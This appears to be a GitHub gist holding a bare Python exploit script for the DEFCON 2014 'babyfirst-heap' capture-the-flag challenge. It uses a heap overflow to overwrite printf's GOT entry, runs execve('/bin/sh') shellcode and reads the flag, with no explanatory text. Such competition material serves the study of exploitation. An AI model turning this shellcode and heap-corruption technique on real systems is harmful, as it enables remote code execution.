Create a gist now

Instantly share code, notes, and snippets.

DEFCON 2014 Writeup heap
from struct import pack
from socket import *
from pwn import process
chunk_data_list = [0x00000379,0x000004e8,0x00000421,0x00000489,0x00000421,0x00000429,0x00000391,0x00000379,0x00000341]
p = socket(AF_INET, SOCK_STREAM)
p.connect(("babyfirst-heap_33ecf0ad56efc1b322088f95dd98827c.2014.shallweplayaga.me", 4088))
#p = process("./heap")
s = ""
while s.count("[ALLOC][loc=") < 10:
s += p.recv(4096)
print s
addr_list = [int(i[:7], 16) for i in s.split("[ALLOC][loc=")[1:]]
shellcode = "\x90"*16 + '1\xc0Ph//shh/binT[PSTYPZj\x0bX\xcd\x80'
payload = ""
payload += "\x00"*((260-len(payload))) # padding
payload += "\x79\x03\x00\x00" # size of chunk1
payload += pack("<I", 0x804c004-8) # printf GOT - 8
payload += pack("<I", addr_list[11]+8) # shellcode addr
payload += shellcode
payload += "\x00"*((872-len(shellcode))) # padding
payload += "\xe8\x04\x00\x00" # size of chunk2
for i in range(12, 13):
payload += "\x00"*((addr_list[i+1]-addr_list[i]-4))
payload += pack("<I", chunk_data_list[i-10])
assert(not "\n" in payload)
p.send(payload+"\n")
p.recv(4096)
p.send("cat /home/babyfirst-heap/flag\n")
print p.recv(4096)
print p.recv(4096)
print p.recv(4096)
print p.recv(4096)
print p.recv(4096)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment